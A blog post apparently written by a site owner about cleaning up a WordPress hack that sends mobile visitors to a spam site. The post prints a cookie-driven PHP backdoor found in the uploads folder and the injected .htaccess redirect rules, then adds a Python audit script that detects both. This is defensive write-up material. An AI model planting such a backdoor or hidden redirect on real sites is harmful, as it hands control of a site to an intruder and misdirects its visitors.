
Category: Software

Fixing a WordPress Redirect Hack

So I got a frantic call from my BFF who said, Daniel, your Science Fiction novels are so good. Can you help me fix my website? This BFF obviously knows how to preface a question, so I agreed to take a look. What I found was both confusing and arousing, and after fixing it, I said to myself, Daniel, your Science Fiction novels are so good, but you’re never going to remember how to fix this. That brings us to this blog post, wherein I tell you how to stop your WordPress website from redirecting to a shitty spam site, specifically when accessed via a mobile device.

The fact that the redirect only happens on mobile devices was quite interesting, but trying to investigate on an iPhone is pretty much impossible. Luckily, Chrome has you covered. Just hit F12 to open Developer Tools and toggle the device toolbar (CTRL-SHIFT-M). Then you can trick the website into thinking you’re an iPhone and trigger the redirect. I did just that, tried to look at the network events, JavaScript debugger, etc., but found nothing! The redirect was taking me to a .bid site, so I grepped for that word in the WordPress install but didn’t find it there either. A quick Google search turned up a lot of advice about looking for encoded PHP in the theme files, but they were all clean.

Then I turned my attention to the uploads folder. I found this file and couldn’t figure out what it did.

```
daniel@bffserver [~]# cat psvkwrmv.php.fart
<?php
$oewzo=$_COOKIE;
$ycke=$oewzo[zutc];
if($ycke){
    $ojaf=$ycke($oewzo[yzda]);
    $gpjc=$ycke($oewzo[kvyi]);
    $fyup=$ojaf("",$gpjc);
    $fyup();
```

I ran it through the hex, base64, and PHP decoders but nothing came up, so I renamed it to a harmless .fart file and moved it out of the uploads directory. Then I found the culprit!
Here are the contents of the .htaccess file in the uploads directory:

```
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} android|bb\d+|meego|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge\ |maemo|midp|mmp|mobile.+firefox|netfront|opera\ m(ob|in)i|palm(\ os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows\ ce|xda|xiino [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a\ wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r\ |s\ )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1\ u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp(\ i|ip)|hs\-c|ht(c(\-|\ |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac(\ |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt(\ |\/)|klon|kpt\ |kwc\-|kyo(c|k)|le(no|xi)|lg(\ g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-|\ |o|v)|zz)|mt(50|p1|v\ )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v\ )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-|\ )|webc|whit|wi(g\ |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-) [NC]
RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]
```

You son of a bitch .htaccess file! Sadly, whatever made those edits also touched the .htaccess files in a bunch of other directories, including the root .htaccess file, which should look like this:

```
dverast@dougherty:~/danielverastiqui.com$ cat .htaccess
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
```

If you need to find all the affected .htaccess files quickly, you can use grep:

```
daniel@bffserver [~]# grep -lR "luxurytds.com" .
grep: ./access-logs: No such file or directory
./www/blog/backup-1408304576-wp-admin/.htaccess
./www/blog/backup-1408304576-wp-includes/.htaccess
./www/blog/backup-1500088171-wp-admin/.htaccess
./www/blog/backup-1500088171-wp-includes/.htaccess
./www/blog/wp-content/backup-1500088171-themes/.htaccess
./www/blog/wp-content/backup-1408304576-themes/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./www/blog/wp-content/backup-1500088171-plugins/.htaccess
./www/blog/wp-content/backup-1408304576-plugins/.htaccess
./www/cgi-bin/.htaccess
./public_html/blog/backup-1408304576-wp-admin/.htaccess
./public_html/blog/backup-1408304576-wp-includes/.htaccess
./public_html/blog/backup-1500088171-wp-admin/.htaccess
./public_html/blog/backup-1500088171-wp-includes/.htaccess
./public_html/blog/wp-content/backup-1500088171-themes/.htaccess
./public_html/blog/wp-content/backup-1408304576-themes/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-lazy-load/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/motopress-content-editor/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/cherry-bgslider-plugin/.htaccess
./public_html/blog/wp-content/backup-1500088171-plugins/.htaccess
./public_html/blog/wp-content/backup-1408304576-plugins/.htaccess
./public_html/cgi-bin/.htaccess
```

After I deleted every .htaccess file and replaced them with the default or recommended versions, the site stopped redirecting. Success! However: I still don’t know exactly how the .htaccess files were being invoked. I mean, I kinda do, but in a much more real way, I have no idea. Would be interested to know for sure.
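The investigation above boils down to two checks that are easy to automate: no PHP file belongs under wp-content/uploads, and no .htaccess in a WordPress tree should rewrite to another host or branch on the User-Agent. For the dropped file, the `$fyup=$ojaf("",$gpjc)` shape is the thing worth recognising: the cookie named zutc supplies a function name, that function is applied to the other two cookie values, the first result is called with `("", <code>)` (the argument shape of PHP's create_function) and the function it builds is executed, so the file itself contains nothing to decode; the payload arrives in the request. For the .htaccess files, Apache applies each directory's .htaccess (where AllowOverride permits) to requests under that directory, which is why a file in uploads/ can act without anything else pointing at it, and a Chrome device-toolbar session trips a RewriteCond on %{HTTP_USER_AGENT} exactly as a phone does. The script below is an added example, not code from the post or from WordPress: it walks an install, flags PHP under uploads, marks variables that come from request input and are then invoked as functions (a small taint pass that catches the dropped file without decoding anything), reports off-site RewriteRule targets and User-Agent conditions, and checks that the root .htaccess still equals the stock block shown above. The site host danielverastiqui.com and every path in the constructed sample tree are assumptions; the two malicious file bodies are the post's, with the long User-Agent list shortened.

```python
import os
import re
import tempfile
from urllib.parse import urlparse

# Directives of the stock WordPress root .htaccess, as shown in the post.
STOCK_DIRECTIVES = [
    "RewriteEngine On",
    "RewriteBase /",
    "RewriteRule ^index\\.php$ - [L]",
    "RewriteCond %{REQUEST_FILENAME} !-f",
    "RewriteCond %{REQUEST_FILENAME} !-d",
    "RewriteRule . /index.php [L]",
]
SUPERGLOBALS = {"_COOKIE", "_REQUEST", "_GET", "_POST"}
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*(.+?);", re.S)
VAR_RE = re.compile(r"\$(\w+)")
REWRITE_RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.M | re.I)
REWRITE_COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)", re.M | re.I)


def tainted_callables(php_source):
    """Names of variables that derive from request input and are then called as
    functions, e.g. $ycke($oewzo[yzda]) in the dropped file.  Taint is propagated
    through plain assignments until no new variable is marked."""
    tainted = set(SUPERGLOBALS)
    changed = True
    while changed:
        changed = False
        for name, rhs in ASSIGN_RE.findall(php_source):
            if name not in tainted and any(v in tainted for v in VAR_RE.findall(rhs)):
                tainted.add(name)
                changed = True
    return {n for n in tainted - SUPERGLOBALS
            if re.search(r"\$" + re.escape(n) + r"\s*\(", php_source)}


def htaccess_findings(text, site_host):
    """Flag RewriteRule targets on another host and rules gated on User-Agent."""
    findings = []
    for pattern, target in REWRITE_RULE_RE.findall(text):
        host = urlparse(target).netloc.lower()
        if host and host != site_host.lower():
            findings.append(f"RewriteRule {pattern} redirects off-site to {host}")
    if any(v.upper() == "%{HTTP_USER_AGENT}" for v in REWRITE_COND_RE.findall(text)):
        findings.append("rewrite gated on User-Agent")
    return findings


def is_stock_wordpress(text):
    """True when the non-comment lines are exactly the stock WordPress block."""
    lines = [" ".join(l.split()) for l in text.splitlines()]
    return [l for l in lines if l and not l.startswith("#")] == STOCK_DIRECTIVES


def audit_tree(root, site_host):
    """Walk a WordPress install and return (relative path, finding) pairs."""
    report = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if fn == ".htaccess":
                report += [(rel, f) for f in htaccess_findings(text, site_host)]
                if rel == ".htaccess" and not is_stock_wordpress(text):
                    report.append((rel, "root .htaccess differs from stock WordPress block"))
            elif fn.lower().endswith((".php", ".phtml", ".php5")):
                if "wp-content/uploads/" in rel:
                    report.append((rel, "PHP file inside uploads"))
                calls = tainted_callables(text)
                if calls:
                    report.append((rel, "request-controlled callable(s): " + ", ".join(sorted(calls))))
    return report


# --- constructed sample tree (hypothetical paths; malicious bodies are from the post) ---
STOCK_HTACCESS = "# BEGIN WordPress\n" + "\n".join(STOCK_DIRECTIVES) + "\n"
MOBILE_REDIRECT_HTACCESS = (  # the uploads/.htaccess from the post, User-Agent list shortened
    "RewriteEngine On\nRewriteBase /\n"
    "RewriteCond %{HTTP_USER_AGENT} android|iemobile|ip(hone|od) [NC]\n"
    "RewriteRule ^$ http://luxurytds.com/go.php?sid=1 [R,L]\n")
DROPPED_PHP = """<?php
$oewzo=$_COOKIE;
$ycke=$oewzo[zutc];
if($ycke){
$ojaf=$ycke($oewzo[yzda]);$gpjc=$ycke($oewzo[kvyi]);$fyup=$ojaf("",$gpjc);$fyup();
"""
BENIGN_PHP = "<?php\n$name = $_COOKIE['user'] ?? 'guest';\necho htmlspecialchars($name);\n"


def build_sample_site():
    """Write the sample files into a fresh temp directory and return its path."""
    root = tempfile.mkdtemp(prefix="wp-audit-")
    for rel, body in {
        ".htaccess": STOCK_HTACCESS,
        "wp-content/uploads/.htaccess": MOBILE_REDIRECT_HTACCESS,
        "wp-content/uploads/psvkwrmv.php": DROPPED_PHP,
        "wp-content/themes/demo/functions.php": BENIGN_PHP,
    }.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, finding in audit_tree(build_sample_site(), "danielverastiqui.com"):
        print(f"{rel}: {finding}")
```

Against a real install, call `audit_tree("/path/to/site", "your.host")`. The taint pass follows only plain assignments, so treat its output as a worklist for manual review rather than a verdict, and note from the grep output above that the backup copies of the tree carry the same infected .htaccess files as the live one.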

© 2018 Daniel Verastiqui